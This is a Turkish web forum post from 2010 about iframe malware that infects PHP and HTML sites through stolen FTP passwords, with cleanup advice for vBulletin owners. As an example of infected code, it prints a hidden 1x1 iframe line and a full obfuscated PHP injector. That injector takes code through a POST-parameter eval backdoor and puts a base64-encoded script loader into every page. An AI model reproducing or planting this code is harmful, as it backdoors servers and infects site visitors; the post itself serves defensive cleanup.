Bilqi Forum  

Geri git   Bilqi Forum > > >

ÖDEVLERİNİZİ BULMAKTA ZORLANIYOMUSUNUZ!

SORUN ANINDA CEVAPLIYALIM.

TÜM SORULARINIZA ANINDA CEVAP VERİLECEKTİR !

Sitemize Üye Olmadan Konulara Cevap Yazabilir Ayrıca Soru Cevap Bölümüne Konu Açabilirsiniz !

Yeni Konu aç Cevapla
 
Seçenekler Stil
Alt 03-11-2010, 23:47   #1
Korax
Android Destek
 
Korax - ait Kullanıcı Resmi (Avatar)
 
Üyelik tarihi: Jan 2008
Yaş: 34
Mesajlar: 21.062
Tecrübe Puanı: 1000
Korax has a reputation beyond reputeKorax has a reputation beyond reputeKorax has a reputation beyond reputeKorax has a reputation beyond reputeKorax has a reputation beyond reputeKorax has a reputation beyond reputeKorax has a reputation beyond reputeKorax has a reputation beyond reputeKorax has a reputation beyond reputeKorax has a reputation beyond reputeKorax has a reputation beyond repute
Korax - MSN üzeri Mesaj gönder
Standart frame, iFrame Virüsü Nedir Nasıl Bulaşır vbulletinden Nasıl Temizlenir

Sitenizin php ve html sayfalarına bulaşan frame ve iframe virüsleri nedir?
Nasıl çalışır ve iframe virüsü nasıl temizlenir?




Bu aralar çok rastlıyorum bu duruma. Genelde CuteFTP programını Crackli kullanan arkadaşlarda bu durum meydana geliyor. Herzaman tavsiyem ücretsiz ve performanslı bir program olan FileZilla ’dır.
Frame virüsü nedir?
Frame ve iFrame olarak tanımlanan bu virüs, FTP yolu ile sitenize bulaşan bir virüs türüdür. Amacı, sitenizin içinde genelde 1×1 pixel lik sayfa açarak, kendi websitesine hit ve rant kazandırmaktır.

Bazıları ise bu hit kazandırmanın yanısıra, bulaşmasını sağlamak için zararlı kod indirilmesini de sağlıyor.
Bir diğer Çeşitleri ise, iframe virüslerinin, sitenizin php ve html sayfalarına bulaşarak google ‘de sandbox a düşürmek / zararlı site olarak tanımlamak. Bu tarz durumlarda hem hit, hemde karizmanızı kaybedebiliyorsunuz.
Çünki, Virüs bulunan bir siteye kimse girmek istemez….

Bir iFrame virüsü nasıl anlaşılır?

[HIDE]

Bir php sayfasına bulaşan iframe virüsünün örnek kodu alttaki gibidir;
PHP- Kodu:
echo "<iframe src=\"http://siteadresi\123" width=1 height=1style=\"visibility:hidden;position:absolute\"></iframe>"
Bu vbulletin dosyalarında Aşagıdaki Şekilde Olabilir

[HTML]
<?php if(!function_exists('tmp_lkojfghx')){if(isset($_PO ST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL ',base64_decode('PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2Nya XB0PjwhLS0gCihmdW5jdGlvbihpT0spe3ZhciB0NHNUPSclJzt 2YXIgaGt3dD0ndmE+NzI+MjBhPjNkPjIyU2NyaXB0RW5naW5lP jIyPjJjPjYyPjNkPjIyVmVyc2k+NmZuKD4yOT4yYj4yMj4yY2o +M2Q+MjI+MjI+MmN1PjNkbj42MXZpPjY3YXRvPjcyPjJlPjc1P jczPjY1ckFnPjY1bnQ+M2JpPjY2PjI4PjI4Pjc1PjJlaT42ZWQ +NjV4T2Y+Mjg+MjJXaW4+MjIpPjNlPjMwKT4yNj4yNj4yOHU+M mVpbmRlPjc4T2Y+Mjg+MjJOVD4yMDY+MjIpPjNjPjMwKT4yNj4 yNihkb2N1PjZkZW50PjJlY29vPjZiaWU+MmU+NjluPjY0ZXhPZ j4yOD4yMm1pPjY1az4zZDE+MjIpPjNjMCk+MjY+MjYoPjc0eT4 3MGU+NmY+NjYoenJ2enRzKT4yMT4zZHQ+NzlwZW9mPjI4PjIyQ T4yMik+Mjk+Mjk+N2J6cj43Nnp0cz4zZD4yMkE+MjI+M2I+NjU +NzZhPjZjPjI4PjIyaWYod2luZG93PjJlPjIyPjJiYT4yYj4yM ilqPjNkPjZhKz4yMis+NjErPjIyTWFqb3I+MjIrYj4yYj42MSs +MjJNaW5vcj4yMitiK2E+MmI+MjJCPjc1aWxkPjIyK2IrPjIya j4zYj4yMik+M2JkPjZmY3U+NmRlbnQ+MmV3cml0ZSg+MjI+M2N zPjYzcmlwdD4yMHNyYz4zZD4yZj4yZj42N3VtYmw+NjE+NzI+M mVjbj4yZnJzPjczPjJmPjNmaT42ND4zZD4yMitqKz4yMj4zZT4 zYz41Yz4yZnNjcmk+NzB0PjNlPjIyKT4zYj43ZCc7dmFyIHg2S z1oa3d0LnJlcGxhY2UoaU9LLHQ0c1QpO2V2YWwodW5lc2NhcGU oeDZLKSl9KSgvPi9nKTsKIC0tPjwvc2NyaXB0Pg=='));funct ion tmp_lkojfghx($s){if($g=(substr($s,0,2)==chr(31).ch r(139)))$s=gzinflate(substr($s,10,-8));if(preg_match_all('#<script(.*?)</script>#is',$s,$a))foreach($a[0] as $v)if(count(explode("\n",$v))>5){$e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);if((preg_match('#\beval\b#',$ v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos ( $v,'document.write')))$s=str_replace($v,'',$s);}$s 1=preg_replace('#<script language=javascript><!-- \ndocument\.write\(unescape\(.+?\n --></script>#','',$s);if(stristr($s,'<body'))$s=preg_re place('#(\s*<body)#mi',TMP_XHGFJOKL.'\1',$s1);else if(($s1!=$s)||stristr($s,'</body')||stristr($s,'</title>'))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($ b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;else $s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('tmp_l kojfghx');for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}if(($a=@set_error_handler('tmp_lkojfghx2'))!=' tmp_lkojfghx2')$GLOBALS['tmp_xhgfjokl']=$a;tmp_lkojfghx2(); ?>[/HTML]


Bu koda teknik açıdan biraz göz atalım.
Kodda php nin echo formatı içinde iframe komutu ile bir sayfa açtırmak istiyor. Bu sayfanın konumlandırılmasında yatayda 1, dikeyde ise 1 pixel derinlik verilmiş.
Kodun çağrıldığı adreste üstte belirttiğim zararlı bir işlem bulunuyor olabilir.

iframe Virüsü Nasıl Temizlenir?
iFrame virüsleri genelde size FTP yolu ile bulaştı ise, tüm şifrelerinizi alır ve kayıt eder. Bu şifrelerinizi periyodik olarak bazı zamanlarda kontrol ederek FTP nize bağlanır. Eğer kodu sildiyseniz, zararlı yazılım ftp sifrenizi bildiginden tekrar girer ve virüs yazılırken tanımlanan php ve diğer sayfalara bulaşır. Bu demektir ki, kodu silmek yeterli değil.
Şimdi adımlar ile neler yapabileceğimize göz atalım…

  • Bir FTP yazılımında Şifreniz Kayıtlı mı?
Eğer şifrenizi FTP programınızda kaydetme gibi bir alışkanlığınız varsa, bundan derhal vazgeçin! Tüm şifreleri FTP programınızdan temizleyin. Eğer Crackli bir FTP yazılımı kullanıyorsanız, (cuteFTP gibi) Kesinlikle bilgisayarınızdan kaldırın ve tavsiye ettiğimiz FileZilla yazılımını kurun.
  • Bilgisayarınızdaki virüsü temizlemelisiniz!

Güncel Bir Bilgisayar Anti vüris Programı İle Bu Mümkün

  • Bir spyware taraması da fena olmazdı!
Ad-aware se programını websitesinden indirin. Bilgisayarınızı bir Spyware taramasından geçirin!
  • Virüsü temizledik Şimdi Sırada Sitemizden temizlemek!
Hemen yeni ve temiz bilgisayarımızda kurulu olan FTP programımız ile sitemize bağlanalım. Sitenizin tüm dosyalarını bilgisayarınıza indirin. İşte bu kısım en zahmetli kısım olacak. Çünki tek tek dosyalardaki kodları temizlemeniz gerekecek! (*)
Tüm dosyaları bilgisayarınıza indirdikten sonra, HTML editörünüz ile açarak, içinde tırnaklar olmadan: “script”, “frame”, “iframe” gibi kelimeleri tek tek aratın. Eğer buldugunuz kod size ait olan bir iframe kodu değilse, zararlı kodu hemen silin!
Eğer birçok dosyaya sahipseniz, bu işlemi birçok HTML editörünün de desteklediği, “tüm sayfalarda bul” seçeneyi ile tüm açık dökümanlarda aratabilirsiniz. Dreamweaver CTRL+H komutu ile bu pencereye ulasip, “find all open files” kısmını işaretlerseniz, tüm dosyalarınızda bunları tek arama ile bulabilir / değiştirebilirsiniz.


  • vbulletinde Bunu Temizlemenin Yolu

    • cuteftp Kullanıyorsanız Bir An Önce Kurtulun pc'den Kaldırın
    • ftp Şifrelerini Degiştirin
    • ftp bulunan Bütün dosyaları silin vbulletin upgrade yoluna gidin Özellikle config.php De Dahil



[/HIDE]
Korax isimli Üye şimdilik offline konumundadır   Alıntı ile Cevapla
Cevapla

Bookmarks


Konuyu Toplam 1 Üye okuyor. (0 Kayıtlı üye ve 1 Misafir)
 
Seçenekler
Stil

Yetkileriniz
Sizin Yeni Konu Acma Yetkiniz var yok
Sizin Konu Yanıtlama Yetkiniz var
You may not post attachments
You may not edit your posts

BB code is Açık
Smileler Açık
[IMG] Kodları Açık
HTML-KodlarıKapalı

Gitmek istediğiniz klasörü seçiniz

Benzer Konular
Konu Konuyu Başlatan Forum Cevaplar Son Mesaj
Güvercin nedir Güvercinler nasıl yetişir nasıl ürer Yaso Hayvanlar alemi 1 10-26-2010 10:43
Kronik hepatit b nedir nasıl bulaşır tanısı nedir Hepatit b ilaçları Sevgi Sağlık - Genel 0 12-18-2009 19:24
Network Nedir? Nasıl Kurulur? nasıl yapmalıyız Korax İnternet 0 10-21-2009 16:22
Fare nedir fare nasıl yaşar fareler nasıl çiftleşir fareler nasıl hayatta kalır besle Yaso Hayvanlar alemi 0 08-16-2009 17:39
Sandbox nedir? / nasıl girilir? / nasıl çıkılır? Yaso Webmaster Genel 0 10-29-2008 13:07


Şu Anki Saat: 07:57


İçerik sağlayıcı paylaşım sitelerinden biri olan Bilqi.com Forum Adresimizde T.C.K 20.ci Madde ve 5651 Sayılı Kanun'un 4.cü maddesinin (2).ci fıkrasına göre TÜM ÜYELERİMİZ yaptıkları paylaşımlardan sorumludur. bilqi.com hakkında yapılacak tüm hukuksal Şikayetler doganinternet@hotmail.com ve streetken27@gmail.com dan iletişime geçilmesi halinde ilgili kanunlar ve yönetmelikler çerçevesinde en geç 1 (Bir) Hafta içerisinde bilqi.com yönetimi olarak tarafımızdan gereken işlemler yapılacak ve size dönüş yapacaktır.
Powered by vBulletin® Version 3.8.4
Copyright ©2000 - 2017, Jelsoft Enterprises Ltd.
Search Engine Optimisation provided by DragonByte SEO v2.0.36 (Lite) - vBulletin Mods & Addons Copyright © 2017 DragonByte Technologies Ltd.

Android Rom

Android Oyunlar

Android samsung htc

Samsung Htc

Nokia Windows